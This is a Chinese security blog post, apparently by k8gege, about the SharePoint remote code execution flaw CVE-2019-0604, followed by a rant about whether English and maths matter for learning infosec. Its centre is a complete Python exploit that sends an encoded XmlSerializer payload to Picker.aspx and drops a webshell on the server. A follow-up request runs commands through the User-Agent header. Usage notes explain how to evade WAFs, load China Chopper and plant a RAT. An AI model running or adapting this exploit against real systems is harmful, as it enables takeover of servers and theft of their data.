Reasecrh sohws taht the odrer of Chniese chaarcters deos not nceessairly afefct raeding; for exmaple, olny wehn you fnisih tihs sntenece do you rlaeise taht the chaarcters in it are all jmbuled.
According to a Cambridge University research result, when the letters inside a word are shuffled you can still understand the whole word. The important part is that the first and last letters of the word stay in the right positions; everything in between can be complete gibberish and you can still read it clearly and without any trouble. The reason is that when the brain recognises a word it does not rely on identifying the order of the letters but takes the word in as a whole.
By the same token, reading Chinese characters is shaped by the brain's preconceived analysis. If the sentence you see has already left an impression in your brain, you can read it out smoothly; if it is a sentence your brain has never processed before, then of course you cannot read it.
The phenomenon that scrambled letters inside a word do not prevent reading (it applies to both Chinese and English) has the formal name Typoglycemia; it describes the cognitive process behind human reading behaviour and has been studied for more than half a century.
The gaokao (college entrance exam) finished only recently, so in the group chats I keep seeing people say that you need good English and good maths to learn information security well. See the Tips section.
Vulnerability information
Microsoft SharePoint is an enterprise collaboration platform from Microsoft Corporation (USA). It integrates business information and lets users share and coordinate work, organise projects and workgroups, and search for people and information.
Microsoft SharePoint remote code execution vulnerabilities (CVE-2019-0594, CVE-2019-0604, high severity): the vulnerability is triggered because SharePoint fails to check the source markup of an application package. An attacker can execute arbitrary code in the context of the SharePoint application pool and on the SharePoint server.
Affected versions:
Attack entry point
The ItemPicker web control is never actually used in any .aspx page. But looking at the usage of its base type, EntityEditorWithPicker, shows that there should be a Picker.aspx page at /_layouts/15/Picker.aspx that uses it.
That page requires the type of the picker dialog to be supplied through the PickerDialogType URL parameter. Either of the following two ItemPickerDialog types can be used here:
· Microsoft.SharePoint.WebControls.ItemPickerDialog in Microsoft.SharePoint.dll
· Microsoft.SharePoint.Portal.WebControls.ItemPickerDialog in Microsoft.SharePoint.Portal.dll
Using the first PickerDialogType
PoC
When the form is submitted with a value for ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData that starts with "__" (for example "__dummy"),
a breakpoint at EntityInstanceIdEncoder.DecodeEntityInstanceId(string) is hit (the call stack is shown in the original article). When the other ItemPickerDialog type is used instead, the call stack differs only in its top two frames.
This shows that the data from ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData ends up in EntityInstanceIdEncoder.DecodeEntityInstanceId(string). All that is left is to replicate the instance ID encoding and build an XmlSerializer payload.
Addendum:
The author says all you need is to build an XML serialization payload, but where do you submit it?
The original article only tells half the story. The complete POST and the exact parameter are:
URL: /_layouts/15/Picker.aspx?PickerDialogType=<assembly-qualified name of the control>
Parameter: ctl00%24PlaceHolderDialogBodySection%24ctl05%24hiddenSpanData=payload
In practice you also have to send the other parameters that Picker.aspx expects (the ViewState and friends); in my testing, submitting the form without them failed.
I wanted to set up an environment to test this as soon as the analysis article came out; on the first day I downloaded the installer and found I had downloaded the wrong one,
and since I had not run into this product on any engagement, and setting up the environment is a time sink I could not be bothered with, I shelved it for a while.
Today I noticed I had already got halfway last week, so I picked it up and looked into it again.
For the details see the original article; I expect plenty of people have already read the article below, and plenty can recite the so-called principle.
Everyone is just waiting for an EXP that actually works, hahaha, I am the legendary "cloud hacker" 鸡你太美!
Chinese translation: https://www.anquanke.com/post/id/173476
EXP
#cve-2019-0604 SharePoint RCE exploit
#date: 20190618
#author: k8gege
import sys
import requests

url0 = sys.argv[1]
url1 = '/_layouts/15/Picker.aspx?PickerDialogType='
url = url0 + url1
# ua.aspx is the webshell the deserialisation payload drops; it executes what arrives in User-Agent
shellurl = url0 + '/_layouts/15/ua.aspx'
exp = 'cve-2019-0604 SharePoint RCE exploit'
# form field that reaches EntityInstanceIdEncoder.DecodeEntityInstanceId
paySpanData = 'ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData'
paySection = 'PlaceHolderDialogBodySection'
ct1 = 'ctl00$'
ct2 = '$ctl05'
# first of the two usable PickerDialogType values (assembly-qualified name)
spver = ('Microsoft.SharePoint.WebControls.ItemPickerDialog,'
         'Microsoft.SharePoint,Version=15.0.0.0,Culture=neutral,'
         'PublicKeyToken=71e9bce111e9429c')
uapay = 'User-Agent'
# payload1..payload3: the encoded entity instance ID carrying the ExpandedWrapper/ObjectDataProvider XmlSerializer gadget
payload1='x5Fx5Fx62x70x38x32x63x31x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x65x32x30x30x34x34x30x30x31x36x30x30x34x37x30x30x31x36x30x30x65x32x30x30x33x35x30x30x35x36x30x30x32x37x30x30x36x37x30x30x39x36x30x30x33x36x30x30x35x36x30x30x33x37x30x30x65x32x30x30x39x34x30x30x65x36x30x30x34x37x30x30x35x36x30x30x32x37x30x30x65x36x30x30x31x36x30x30x63x36x30x30x65x32x30x30x35x34x30x30x38x37x30x30x30x37x30x30x31x36x30x30x65x36x30x30x34x36x30x30x35x36x30x30x34x36x30x30x37x35x30x30x32x37x30x30x31x36x30x30x30x37x30x30x30x37x30x30x35x36x30x30x32x37x30x30x30x36x30x30x32x33x30x30x62x35x30x30x62x35x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x65x32x30x30x37x35x30x30x39x36x30x30x65x36x30x30x34x36x30x30x66x36x30x30x37x37x30x30x33x37x30x30x65x32x30x30x64x34x30x30x31x36x30x30x32x37x30x30x62x36x30x30x35x37x30x30x30x37x30x30x65x32x30x30x38x35x30x30x31x36x30x30x64x36x30x30x63x36x30x30x32x35x30x30x35x36x30x30x31x36x30x30x34x36x30x30x35x36x30x30x32x37x30x30x63x32x30x30x30x32x30x30x30x35x30x30x32x37x30x30x35x36x30x30x33x37x30x30x35x36x30x30x65x36x30x30x34x37x30x30x31x36x30x30x34x37x30x30x39x36x30x30x66x36x30x30x65x36x30x30x36x34x30x30x32x37x30x30x31x36x30x30x64x36x30x30x35x36x30x30x37x37x30x30x66x36x30x30x32x37x30x30x62x36x30x30x63x32x30x30x30x32x30x30x36x35x30x30x35x36x30x30x32x37x30x30x33x37x30x30x39x36x30x30x66x36x30x30x65x36x30x30x64x33x30x30x34x33x30x30x65x32x30x30x30x33x30x30x65x32x30x30x30x33x30x30x65x32x30x30x30x33x30x30x63x32x30x30x30x32x30x30x33x34x30x30x35x37x30x30x63x36x30x30x34x37x30x30x35x37x30x30x32x37x30x30x35x36x30x30x64x33x30x30x65x36x30x30x35x36x30x30x35x37x30x30x34x37x30x30x32x37x30x30x31x36x30x30x63x36x30x30x63x32x30x30x30x32x30x30x30x35x30x30x35x37x30x30x32x36x30x30x63x36x30x30x39x36x30x30x33x36x30x30x62x34x30x30x35x36x30x30x39x37x30x30x34x35x30x30x66x36x30x30x62x36x30x30x35x36x30x30x65x36x30x30x64x33x30x30x33x33x30x30x31x33x30x30x32x36x30x30x36x36x30x30x33x33x30x30x38x33x30x30x35x33x30x30x36x33x30x30x31x36x30x
30x34x36x30x30x33x33x30x30x36x33x30x30x34x33x30x30x35x36x30x30x33x33x30x30x35x33x30x30x64x35x30x30x63x32x30x30x62x35x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x65x32x30x30x37x35x30x30x39x36x30x30x65x36x30x30x34x36x30x30x66x36x30x30x37x37x30x30x33x37x30x30x65x32x30x30x34x34x30x30x31x36x30x30x34x37x30x30x31x36x30x30x65x32x30x30x66x34x30x30x32x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30' payload2='x38x37x30x30x64x36x30x30x63x36x30x30x30x32x30x30x36x37x30x30x35x36x30x30x32x37x30x30x33x37x30x30x39x36x30x30x66x36x30x30x65x36x30x30x64x33x30x30x32x32x30x30x31x33x30x30x65x32x30x30x30x33x30x30x32x32x30x30x30x32x30x30x35x36x30x30x65x36x30x30x33x36x30x30x66x36x30x30x34x36x30x30x39x36x30x30x65x36x30x30x37x36x30x30x64x33x30x30x32x32x30x30x35x37x30x30x34x37x30x30x36x36x30x30x64x32x30x30x31x33x30x30x36x33x30x30x32x32x30x30x66x33x30x30x65x33x30x30x64x30x30x30x61x30x30x30x63x33x30x30x35x34x30x30x38x37x30x30x30x37x30x30x31x36x30x30x65x36x30x30x34x36x30x30x35x36x30x30x34x36x30x30x37x35x30x30x32x37x30x30x31x36x30x30x30x37x30x30x30x37x30x30x35x36x30x30x32x37x30x30x66x34x30x30x36x36x30x30x38x35x30x30x31x36x30x30x64x36x30x30x63x36x30x30x32x35x30x30x35x36x30x30x31x36x30x30x34x36x30x30x35x36x30x30x32x37x30x30x66x34x30x30x32x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30x34x37x30x30x34x34x30x30x31x36x30x30x34x37x30x30x31x36x30x30x30x35x30x30x32x37x30x30x66x36x30x30x36x37x30x30x39x36x30x30x34x36x30x30x35x36x30x30x32x37x30x30x30x32x30x30x38x37x30x30x64x36x30x30x63x36x30x30x65x36x30x30x33x37x30x30x61x33x30x30x38x37x30x30x33x37x30x30x39x36x30x30x64x33x30x30x32x32x30x30x38x36x30x30x34x37x30x30x34x37x30x30x30x37x30x30x61x33x30x30x66x32x30x30x66x32x30x30x37x37x30x30x37x37x30x30x37x37x30x30x65x32x30x30x37x37x30x30x33x33x30x30x65x32x30x30x66x36x30x30x32x37x30x30x37x36x30x30x66x32x30x30x32x33x30x30x30x33x30x30x30x33x30x30x31x33x30x30x66x32x30x30x38x35x30x30x64x34x30x30x63x34x30x30x33x35x30x30x33x36x30x30x38x36x30x30x35x36x30x30x64x36x30x30x31x36x30x30x64x32x30x30x39x36
x30x30x65x36x30x30x33x37x30x30x34x37x30x30x31x36x30x30x65x36x30x30x33x36x30x30x35x36x30x30x32x32x30x30x30x32x30x30x38x37x30x30x64x36x30x30x63x36x30x30x65x36x30x30x33x37x30x30x61x33x30x30x38x37x30x30x33x37x30x30x34x36x30x30x64x33x30x30x32x32x30x30x38x36x30x30x34x37x30x30x34x37x30x30x30x37x30x30x61x33x30x30x66x32x30x30x66x32x30x30x37x37x30x30x37x37x30x30x37x37x30x30x65x32x30x30x37x37x30x30x33x33x30x30x65x32x30x30x66x36x30x30x32x37x30x30x37x36x30x30x66x32x30x30x32x33x30x30x30x33x30x30x30x33x30x30x31x33x30x30x66x32x30x30x38x35x30x30x64x34x30x30x63x34x30x30x33x35x30x30x33x36x30x30x38x36x30x30x35x36x30x30x64x36x30x30x31x36x30x30x32x32x30x30x65x33x30x30x64x30x30x30x61x30x30x30x30x32x30x30x30x32x30x30x63x33x30x30x30x35x30x30x32x37x30x30x66x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30x34x37x30x30x35x36x30x30x34x36x30x30x30x35x30x30x32x37x30x30x66x36x30x30x30x37x30x30x35x36x30x30x32x37x30x30x34x37x30x30x39x37x30x30x30x33x30x30x65x33x30x30x64x30x30x30x61x30x30x30x30x32x30x30x30x32x30x30x30x32x30x30x30x32x30x30x63x33x30x30x66x34x30x30x32x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30x34x37x30x30x39x34x30x30x65x36x30x30x33x37x30x30x34x37x30x30x31x36x30x30x65x36x30x30x33x36x30x30x35x36x30x30x30x32x30x30x38x37x30x30x33x37x30x30x39x36x30x30x61x33x30x30x34x37x30x30x39x37x30x30x30x37x30x30x35x36x30x30x64x33x30x30x32x32x30x30x38x35x30x30x31x36x30x30x64x36x30x30x63x36x30x30x32x35x30x30x35x36x30x30x31x36x30x30x34x36x30x30x35x36x30x30x32x37x30x30x32x32x30x30x30x32x30x30x66x32x30x30x65x33x30x30x64x30x30x30x61x30x30x30x30x32x30x30x30x32x30x30x30x32x30x30x30x32x30x30x63x33x30x30x64x34x30x30x35x36x30x30x34x37x30x30x38x36x30x30x66x36x30x30x34x36x30x30x65x34x30x30x31x36x30x30x64x36x30x30x35x36x30x30x65x33x30x30x30x35x30x30x31x36x30x30x32x37x30x30x33x37x30x30' 
payload3='x61x33x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x62x33x30x30x31x36x30x30x33x37x30x30x33x37x30x30x35x36x30x30x64x36x30x30x32x36x30x30x63x36x30x30x39x37x30x30x64x33x30x30x64x36x30x30x33x37x30x30x33x36x30x30x66x36x30x30x32x37x30x30x63x36x30x30x39x36x30x30x32x36x30x30x32x32x30x30x64x30x30x30x61x30x30x30x38x37x30x30x64x36x30x30x63x36x30x30x65x36x30x30x33x37x30x30x61x33x30x30x34x34x30x30x39x36x30x30x31x36x30x30x37x36x30x30x64x33x30x30x32x32x30x30x33x36x30x30x63x36x30x30x32x37x30x30x64x32x30x30x65x36x30x30x31x36x30x30x64x36x30x30x35x36x30x30x33x37x30x30x30x37x30x30x31x36x30x30x33x36x30x30x35x36x30x30x61x33x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x65x32x30x30x34x34x30x30x39x36x30x30x31x36x30x30x37x36x30x30x65x36x30x30x66x36x30x30x33x37x30x30x34x37x30x30x39x36x30x30x33x36x30x30x33x37x30x30x62x33x30x30x31x36x30x30x33x37x30x30x33x37x30x30x35x36x30x30x64x36x30x30x32x36x30x30x63x36x30x30x39x37x30x30x64x33x30x30x33x37x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x32x32x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x64x30x30x30x61x30x30x30x39x30x30x30x36x32x30x30x63x36x30x30x34x37x30x30x62x33x30x30x66x34x30x30x32x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30x34x37x30x30x34x34x30x30x31x36x30x30x34x37x30x30x31x36x30x30x30x35x30x30x32x37x30x30x66x36x30x30x36x37x30x30x39x36x30x30x34x36x30x30x35x36x30x30x32x37x30x30x30x32x30x30x38x37x30x30x61x33x30x30x62x34x30x30x35x36x30x30x39x37x30x30x64x33x30x30x32x32x30x30x63x34x30x30x31x36x30x30x35x37x30x30x65x36x30x30x33x36x30x30x38x36x30x30x33x34x30x30x31x36x30x30x63x36x30x30x33x36x30x30x38x36x30x30x32x32x30x30x30x32x30x30x66x34x30x30x32x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30x34x37x30x30x34x35x30x30x39x37x30x30x30x37x30x30x35x36x30x30x64x33x30x30x32x32x30x30x62x37x30x30x38x37x30x30x61x33x30x30x34x35x30x30x39x37x30x30x30x37x30x30x35x36x30x30x30x32x30x30x34x34x30x30x39x36x30x30x31x36x30x30x37x36x30x30x61x33x30x30x30x35x30x30x32x37x30x
30x66x36x30x30x33x36x30x30x35x36x30x30x33x37x30x30x33x37x30x30x64x37x30x30x32x32x30x30x30x32x30x30x64x34x30x30x35x36x30x30x34x37x30x30x38x36x30x30x66x36x30x30x34x36x30x30x65x34x30x30x31x36x30x30x64x36x30x30x35x36x30x30x64x33x30x30x32x32x30x30x33x35x30x30x34x37x30x30x31x36x30x30x32x37x30x30x34x37x30x30x32x32x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x64x30x30x30x61x30x30x30x39x30x30x30x39x30x30x30x36x32x30x30x63x36x30x30x34x37x30x30x62x33x30x30x66x34x30x30x32x36x30x30x61x36x30x30x35x36x30x30x33x36x30x30x34x37x30x30x34x34x30x30x31x36x30x30x34x37x30x30x31x36x30x30x30x35x30x30x32x37x30x30x66x36x30x30x36x37x30x30x39x36x30x30x34x36x30x30x35x36x30x30x32x37x30x30x65x32x30x30x64x34x30x30x35x36x30x30x34x37x30x30x38x36x30x30x66x36x30x30x34x36x30x30x30x35x30x30x31x36x30x30x32x37x30x30x31x36x30x30x64x36x30x30x35x36x30x30x34x37x30x30x35x36x30x30x32x37x30x30x33x37x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x64x30x30x30x61x30x30x30x39x30x30x30x39x30x30x30x39x30x30x30x36x32x30x30x63x36x30x30x34x37x30x30x62x33x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x61x33x30x30x33x35x30x30x34x37x30x30x32x37x30x30x39x36x30x30x65x36x30x30x37x36x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x33x36x30x30x64x36x30x30x34x36x30x30x36x32x30x30x63x36x30x30x34x37x30x30x62x33x30x30x66x32x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x61x33x30x30x33x35x30x30x34x37x30x30x32x37x30x30x39x36x30x30x65x36x30x30x37x36x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x64x30x30x30x61x30x30x30x39x30x30x30x39x30x30x30x39x30x30x30x36x32x30x30x63x36x30x30x34x37x30x30x62x33x30x30x33x35x30x30x39x37x30x30x33x37x30x30x34x37x30x30x35x36x30x30x64x36x30x30x61x33x30x30x33x35x30x30x34x37x30x30x32x37x30x30x39x36x30x30x65x36x30x30x37x36x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x66x32x30x30x33x36x30x30x30x32x30x30x35x36x30x30x33x36x30x30x38x36x30x30x66x36x30x30x30x32x30x30x65x35x30x30x36x32x30x30x31x36x30x30x64x36x30x30x30x37
x30x30x62x33x30x30x63x36x30x30x34x37x30x30x62x33x30x30x35x32x30x30x30x34x30x30x30x32x30x30x30x35x30x30x31x36x30x30x37x36x30x30x35x36x30x30x30x32x30x30x63x34x30x30x31x36x30x30x65x36x30x30x37x36x30x30x35x37x30x30x31x36x30x30x37x36x30x30x35x36x30x30x64x33x30x30x32x32x30x30x61x34x30x30x33x37x30x30x33x36x30x30x32x37x30x30x39x36x30x30x30x37x30x30x34x37x30x30x32x32x30x30x30x32x30x30x35x32x30x30x65x35x30x30x36x32x30x30x37x36x30x30x34x37x30x30x62x33x30x30x65x35x30x30x36x32x30x30x31x36x30x30x64x36x30x30x30x37x30x30x62x33x30x30x63x36x30x30x34x37x30x30x62x33x30x30x35x32x30x30x36x37x30x30x31x36x30x30x32x37x30x30x30x32x30x30x30x37x30x30x37x37x30x30x34x36x30x30x64x33x30x30x32x32x30x30x34x37x30x30x66x36x30x30x64x36x30x30x32x32x30x30x62x33x30x30x36x37x30x30x31x36x30x30x32x37x30x30x30x32x30x30x35x37x30x30x31x36x30x30x33x37x30x30x34x37x30x30x32x37x30x30x64x33x30x30x32x35x30x30x35x36x30x30x31x37x30x30x35x37x30x30x35x36x30x30x33x37x30x30x34x37x30x30x65x32x30x30x35x35x30x30x33x37x30x30x35x36x30x30x32x37x30x30x31x34x30x30x37x36x30x30x35x36x30x30x65x36x30x30x34x37x30x30x62x33x30x30x39x36x30x30x36x36x30x30x30x32x30x30x38x32x30x30x35x37x30x30x31x36x30x30x33x37x30x30x34x37x30x30x32x37x30x30x65x32x30x30x33x35x30x30x35x37x30x30x32x36x30x30x33x37x30x30x34x37x30x30x32x37x30x30x39x36x30x30x65x36x30x30x37x36x30x30x38x32x30x30x30x33x30x30x63x32x30x30x30x32x30x30x35x37x30x30x31x36x30x30x33x37x30x30x34x37x30x30x32x37x30x30x65x32x30x30x39x34x30x30x65x36x30x30x34x36x30x30x35x36x30x30x38x37x30x30x66x34x30x30x36x36x30x30x38x32x30x30x32x32x30x30x64x33x30x30x64x33x30x30x64x33x30x30x32x32x30x30x39x32x30x30x39x32x30x30x64x33x30x30x64x33x30x30x30x32x30x30x30x37x30x30x37x37x30x30x34x36x30x30x39x32x30x30x30x32x30x30x62x37x30x30x36x37x30x30x31x36x30x30x32x37x30x30x30x32x30x30x33x36x30x30x66x36x30x30x34x36x30x30x35x36x30x30x64x33x30x30x35x37x30x30x31x36x30x30x33x37x30x30x34x37x30x30x32x37x30' payload4='x74x6Fx6Dx3Dx3Dx3Dx52x65x73x70x6Fx6Ex73x65x2Ex57x72x69x74x65x28x22x55x41x73x68x65x6Cx6Cx22x29x3B' 
payload5 = '#date: 20190626 #author: k8gege'

# Form fields Picker.aspx expects besides hiddenSpanData (captured from a real session).
values = {
    '__REQUESTDIGEST': '0xF4545A48FA093FD290D386F2E317C72EF439C05EABDC8BDF0D81022DAEFE10FF6D4782A17836870BB0EBF673E71DCD6F7E631A1371319881902FDEF3032A16F4,18 Jun 2019 16:41:35 -0000',
    '__EVENTTARGET': '',
    '__EVENTARGUMENT': '',
    '__spPickerHasReturnValue': '',
    '__spPickerReturnValueHolder': '',
    '__VIEWSTATE': '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',
    '__VIEWSTATEGENERATOR': 'A123E449',
    ct1 + paySection + '$ctl07$queryTextBox': '',
    paySpanData: payload1 + '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' + payload2 + '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' + payload3 + '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',
    ct1 + paySection + ct2 + '$OriginalEntities': '<Entities />',
    ct1 + paySection + ct2 + '$HiddenEntityKey': '',
    ct1 + paySection + ct2 + '$HiddenEntityDisplayText': '',
    ct1 + paySection + ct2 + '$downlevelTextBox': ' ',
    '__CALLBACKID': ct1 + paySection + '$ctl07',
    '__CALLBACKPARAM': ';#;#11;#;#;#',
    '__EVENTVALIDATION': '/wEdAArGxMN0ZJ7K9w5zktdyYEhBD0ElpjQ1qya+g3gJn5tj2kGdpzwPwReE9qIrxAfsdm2iW+aWbiEcyxsYaScsTlQ450VsGNyXdI9EVzK0gDisZ5XfOLdqAfYHRFskSc14VkFc8gJL9PF80m6F3xAWwiF2sOBSyZzTvibJdZIQ6/yiluhmzA7nAUttaM/XaeAk14GgLvO2vw2Ax/oUZshBCs1rvRIjfjnjQxx1nrwDNJpAlG8icRe2xKLDvCGTmWjcu2A=',
}

# Step 1: POST the form to Picker.aspx; deserialising hiddenSpanData writes ua.aspx on the server.
response = requests.post(url + spver, data=values)
print(exp + ' ' + payload5)
print(response.text)

# Step 2: call the dropped shell with the command in the User-Agent header.
headers = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
    "Accept-Language": "en",
    "Cache-Control": "max-age=0",
    "Connection": "keep-alive",
    # browser template leftovers; SharePoint (ASP.NET) does not use a PHPSESSID cookie
    "Cookie": "PHPSESSID=m2hbrvp548cg6v4ssp0l35kcj7; _ga=GA1.2.2052701472.1532920469; _gid=GA1.2.1351314954.1532920469; __atuvc=3%7C31; __atuvs=5b5e9a0418f6420c001",
    # "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36",
    "Upgrade-Insecure-Requests": "1",
    uapay: payload4,
}
response = requests.get(shellurl, headers=headers, timeout=5)
if response.text == 'UAshell':
    print('UAshell: ' + shellurl)
In practice:
python cve-2019-0604-exp.py http://k8gege.github.io
On success it prints the WebShell URL.
Opening the UAshell URL directly returns an error; don't panic, it is designed that way (it only acts on what arrives in the User-Agent header).
Connect to it with the K8飞刀 (K8 Flying Knife) CMD; of course you can also use that CMD to download other webshells to manage the box,
such as 菜刀 (Caidao / China Chopper), because apart from getting past WAFs the K8飞刀 UA-series webshells have no file-management features.
The reason for using the UA shell rather than a Caidao one-liner is that Caidao one-liners all use POST, which a WAF easily blocks.
Naturally, once it is uploaded and you find the target has no WAF or AV, you can upload other webshells or plant a RAT.
Download:
https://github.com/k8gege/CVE-2019-0604
https://github.com/k8gege/K8tools/raw/master/cve-2019-0604-exp.py
Tips:
The gaokao finished only recently, so in the group chats I see people saying you need good English and good maths to learn information security well.
1. English
There is not much to say about English. The "joke" at the start of this article was originally published by Cambridge University, meaning the original "joke" was in English.
What does that tell you? So-called grammar does not matter; Chinese is the same: once you have a certain awareness, you can read it even when it is scrambled.
For example, everyone understands the basics of SQL injection. If an article gives you the injection URL and the injectable parameter,
whether the article is in English or Chinese, you know how to run Sqlmap against it. But hand it to someone with no foundation,
and even a very detailed Chinese write-up will not help; never mind Chinese, if someone explained it in his home dialect he still would not understand.
When you read the "joke" at the start, your brain automatically reorders and stitches it into a fluent sentence, but the premise is that you already have some foundation.
Lots of people say they cannot read about new vulnerabilities or new APT attacks because they are in English. What does that have to do with English???
Did you swallow Google Translate and Baidu Translate??? At worst the translated Chinese has a scrambled word order.
Never went to primary school, cannot read Chinese characters??? The people who really cannot understand are the ones who do not understand the techniques in the so-called APT reports.
Currently, 80% of the techniques mentioned in 90% of APT articles are ten-year-old techniques; there is not much new technology.
What there is plenty of is new buzzwords, which sound far more impressive than before, while the actual techniques have changed little.
2. Maths
If by maths you mean exams, Chinese people leave foreigners in the dust by a mile;
I hear people abroad find maths a real headache, and that the maths content at many foreign universities is actually Chinese middle-school maths.
But the funniest thing is that many mathematical theorems were invented by foreigners; does that not tell you something?
Why do foreigners do badly on exams, yet their science and technology are still very strong in many areas?
3. Examples
First an example. I had two high-school classmates; one was the only person from our year to get into Liugao (Liuzhou High School) and was ranked first in the year overall.
The other was also very capable, top ten in the year or so, but the point I want to make is that his English was excellent, and his physics and maths were good too.
Yet in individual subjects they both had to ask me: in physics and chemistry, for instance, I was also basically first in the year, and genuinely so; as soon as I learned my score
I immediately knew where I had gone wrong and why, whereas the others, superficially high-scoring, did not necessarily know where they had gone wrong and only understood after the teacher explained it.
I, on the other hand, was famous in the whole school for being lopsided: my English was not good (in junior high my English teacher said I would never get by without learning English).
On paper my English was a few dozen points, occasionally passing, and even then only passing on paper; in reality my English was about as bad as the bottom of the class.
For those two high-school classmates I would rate their English and maths as excellent, and at university they studied computer software development.
At university they told me that after graduation they would be developing systems for banks and the like, which sounded very impressive.
At the time they bragged that they were great at IT and great at hacking, and that their living expenses came from stealing accounts.
I believed they really were good, because stealing accounts genuinely was easy back then and I was not much of a programmer yet.
In my eyes anyone who could program was awesome, never mind that they said they could write any system, account-stealing software and the like, at will.
About half a year later I ran into them back home; apparently they had realised I genuinely knew this stuff, so they admitted they had been bluffing
and wanted to learn from me. I told them that if they were really interested they could go to the websites that host my videos; I never saw them go.
After graduation I heard the one who was first in the year is now in sales, and the other is now a primary-school teacher.
Leaving my classmates aside, look at yours: never mind how many top people in this field have nothing to do with an infosec degree,
first look at all the infosec graduates: how many from the same class actually work in infosec after graduating?
Some of you have classmates with very good English, and they are not in this field either.
4. In my view the most important things for learning IT well are interest and logical thinking
Solving maths problems is the best way to train logical thinking; people who are good at maths generally have decent logical thinking.
But maths is not the only way to train it; reasoning puzzles, chess, anything that requires thinking works.
Isn't pentesting all about trying various approaches? Writing programs is the same, you try various functions.
Many programmers are rigid because their work is too monotonous, writing the same fixed modules or features over and over.
Of course, decent logical thinking does not mean someone will be strong at IT; they also need an interest in learning it.
Note that I mean people who genuinely understand, not those who memorise by rote, cannot generalise, and only score well on exams.
That is also the real reason many people are great at exams yet in practice cannot beat people abroad.
So are slower people unsuited to this field? Of course not being as smart as others does not matter; you just need to spend more time learning.
At worst you start a bit slower; much of it you will come to understand naturally; it is the same few tricks over and over, there is nothing that cannot be learned.
But if you are weak and use bad English or bad maths as an excuse, then I think you really are not suited to it.
If you stay in this line of work, your level will forever be stuck at waiting for someone else to publish an article, a tool, or even a tutorial.
Take this article's EXP: you say your English is bad, fine, you do not have to read the original; plenty of people in China with good English have translated it,
and there is a direct Chinese article; can you not read Chinese? Besides, cve-2019-0604 has been out for ages; how many of the people around you with good English
have produced an EXP? Most people can read the Chinese version, so why has nobody released an EXP tool either?
What is the real reason? It is not which language you can read; the root cause is your current technical level.
At best, good English means reading English as fluently as Chinese, and a translation reads just as quickly (the brain reorders it automatically).
You can read text with scrambled order just fine, and most translations are not that bad anyway; being weak has nothing to do with English.
Writing code needs it even less: most development tools have autocomplete, type the first letter and a list pops up,
you only need to know roughly what it looks like, and failing that, search Baidu or Google. Even the Microsoft engineers who build the tools
consult the relevant documentation as they write code, and scientists doing research likewise look up all kinds of material.
Many top people also say that books are only for getting started and Google is for improving (TK says this often on Weibo and Zhihu).
You are just someone working in IT; is looking things up on Baidu or Google beneath you? Weak, lazy, and fond of excuses.
The scariest thing in this world is not that someone is smarter than you; it is that the people smarter than you also work harder than you.